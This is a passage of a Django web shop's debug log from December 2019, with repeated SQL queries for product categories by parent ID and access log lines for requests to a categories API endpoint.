"shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:10:02,706 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:10:02,709 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:10:02,712 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:10:02,714 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:10:02,717 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:10:02,720 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:10:02,723 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:10:02] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [16/Dec/2019 07:10:06] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 07:10:07,406 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:10:07,411 utils 20136 140506432534272 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 46; args=(46,) DEBUG 2019-12-16 07:10:07,417 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:10:07,421 utils 20136 140506432534272 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:10:07,422 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:10:07,425 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:10:07,429 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) [16/Dec/2019 07:10:07] "GET /api/v1/categories/46 HTTP/1.0" 200 184 DEBUG 2019-12-16 07:10:07,432 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:10:07,435 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:10:07,437 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:10:07,440 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:10:07,443 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:10:07,446 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:10:07,449 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:10:07,451 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:10:07,454 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:10:07,458 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:10:07,460 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:10:07,463 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:10:07,465 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:10:07,469 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:10:07,473 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:10:07,475 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:10:07,478 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:10:07,480 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:10:07,483 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:10:07,486 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:10:07,490 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:10:07,493 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:10:07,497 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:10:07,501 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:10:07,504 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:10:07,510 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:10:07,514 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:10:07,517 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:10:07,519 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:10:07,522 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:10:07,525 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:10:07,528 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:10:07,530 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:10:07,533 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:10:07,535 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:10:07,537 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:10:07,540 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:10:07,543 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:10:07,545 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:10:07,548 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:10:07,550 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:10:07] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:10:16,882 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:10:16,889 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:10:16,892 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 3; args=(3,) DEBUG 2019-12-16 07:10:16,895 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:10:16,897 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:10:16,900 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:10:16,904 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) [16/Dec/2019 07:10:16] "GET /api/v1/categories/3 HTTP/1.0" 200 942 DEBUG 2019-12-16 07:10:16,906 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:10:16,909 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:10:16,911 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:10:16,913 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:10:16,916 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM 